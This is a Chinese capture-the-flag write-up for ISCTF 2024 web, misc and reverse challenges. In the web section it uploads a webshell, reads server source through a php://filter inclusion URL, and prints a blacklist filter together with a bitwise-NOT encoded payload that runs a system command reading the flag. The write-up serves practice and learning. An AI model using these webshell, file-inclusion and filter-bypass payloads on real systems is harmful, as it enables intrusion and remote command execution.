web
2024isctf 25时晓山瑞希生日会
根据提示需要构造客户端请求,用bp抓包构造
提示只能从本地来,构造xff
又提示时间不对,去查了一下时间是8月27日,就伪造一个时间头
提示要rfc 822的形式,去查了一下,加上年份,时间随便输一个就行
2024isctf UP!UPloader
打开题目是一个文件上传的题目,先传马
提示路径没给,要自己找,这里就构造php伪协议读取源码
http://gz.imxbt.cn:20219/include.php?filename=php://filter/convert.base64-encode/resource=upload.php
用赛博厨师炒一下
<?php
error_reporting(0);
$file = $_FILES['file'];
if (isset($file) && $file['size'] > 0) {
$ext = pathinfo($file['name'], PATHINFO_EXTENSION);
$name = pathinfo($file['name'], PATHINFO_FILENAME);
$dir_name = $name . '.' . $ext;
$upload_dir = './uploads/';
if (!is_dir($upload_dir)) {
mkdir($upload_dir, 0755, true);
}
if (move_uploaded_file($file['tmp_name'], $upload_dir . md5($dir_name) . '.' . $ext)) {
echo "æ–‡ä»¶ä¸Šä¼ æˆåŠŸï¼ä¸è¿‡æ–‡ä»¶è·¯å¾„å¯ä¸å¥½æ‰¾å‘€~什么?什么include.php?我ä¸çŸ¥é“啊。" ;
} else {
echo "文件å˜å‚¨å¤±è´¥ï¼ŒæœªçŸ¥åŽŸå› ......";
}
die();
}
?>
从源码里面可以看出,新的文件名是文件名加拓展后进行md5的加密结果,记得加拓展名
但是蚁剑里面找不到,在根目录处打开终端,输入evn查看环境flag在环境里
2024isctf 小蓝鲨的秘密
打开页面跳转到了蓝鲨的官网,但是里面并没有什么信息,根据查询这个题考的是重定向问题用bp抓包重发即可,有两三个这种的URL需要自己重发去判断
2024isctfezrce
代码审计
<?php
error_reporting(0);
if (isset($_GET['cmd'])) {
$cmd = $_GET['cmd'];
if (preg_match("/flag|cat|ls|echo|php|bash|sh|more| |less|head|tail|[\|\&\>\<]|eval|system|exec|popen|shell_exec/i", $cmd)) {
die("Blocked by security filter!");
} else {
eval($cmd);
}
} else {
highlight_file(__FILE__);
}
黑名单太多了,就学了一下取反绕过
exp:
http://gz.imxbt.cn:20250/?cmd=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98);
misc
2024isctf 少女的秘密花园
解压附件是一张图片用CTF一把梭看一下
里面藏了一个压缩包,用binwalk分一下,得到一个压缩包,解压后得到一个文件,放进010看一下
是个压缩包,要密码
用工具炸一下
解压得到一个txt但是看这个大小应该不是文字,看到文件名带base,猜测是base加密,赛博厨师炒一下
得到是png,导出来
这个高度应该不对,用CTF一把梭修复
根据搜索是盲文
手搓一下得到JFJUGVCGPNBTA3LFL4YG4X3GOIZTK2DNGNXH2,随波逐流梭哈了
re
base2024ctf upx mini
先查壳用upx脱壳用ida分析,找主调函数,反汇编
在主调函数中发现加密方式为base64用赛博大厨炒一下
这道题的难点在于upx脱壳工具的选择,这道题用exe查壳会有提示
用kali里的upx -d脱壳脱不了,用工具脱也脱不了,最后发现只能用最原始的方式脱